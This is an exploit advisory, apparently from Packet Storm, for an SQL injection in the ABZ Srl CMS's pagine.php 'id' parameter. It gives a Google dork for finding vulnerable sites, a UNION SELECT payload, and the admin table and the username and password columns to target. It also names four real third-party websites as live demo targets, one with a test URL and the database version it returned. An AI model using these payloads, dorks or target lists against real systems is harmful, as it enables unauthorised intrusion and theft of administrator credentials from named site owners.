ABZ Srl CMS SQL Injection

2014-06-05T00:00:00
ID PACKETSTORM:126952
Type packetstorm
Reporter Medrik
Modified 2014-06-05T00:00:00

Description

                                        
                                            `  
[+] Exploit Title: (ABZ Srl) Cms SQL Injection  
[+] Exploit Author: Medrik  
[+] Found Date: 13-03-2014  
[+] Vendor Homepage: http://www.abzsrl.com/  
[+] Google Dork: intext:"powered by ABZ Srl" inurl:pagine.php?id=  
[+] Tested on: Windows  
  
==========================================  
[+] Exploit (Vulnerability Locate):  
  
http://[vulnerable_host]/pagine.php?id=IdNumber[SQLi]  
  
You Can Inject This SQLi Vuln With Some Tools Like SqlMap Or Other Tools .  
  
  
[*] Important Table : AMMINISTRAZIONE  
  
[*] Important Columns : For User : [ USERN ] & For Password : [ PSWD ]  
  
[*] Example Poc For Database Version : +/*!union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--  
  
[*] Test : http://www.reginanewhouse.com/pagine.php?id=2+/*!union*/+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--  
[*] Response For Test : 5.5.36-34.2-log  
  
[*] Admin Page : /admin [*]  
  
[*] Image : http://i.imgur.com/wNAWyBI.png  
  
==========================================  
  
[+] Demo (s) :  
  
(#) http://www.reginanewhouse.com/pagine.php?id=2[SQli]  
(#) http://www.gruppo-ria.com/pagine.php?id=2[SQli]  
(#) http://www.euroxoro-torino.it/pagine.php?id=7[SQli]  
(#) http://www.dimsegnaletica.com/pagine.php?id=4[SQli]  
  
==========================================  
  
[+] Gr33tz :  
  
R33VES , Enddo , Beni_Vanda , Explo!ter , Black.KinG , M.R.S.CO , MR.0x41 , Dr.3v1l  
  
==========================================  
`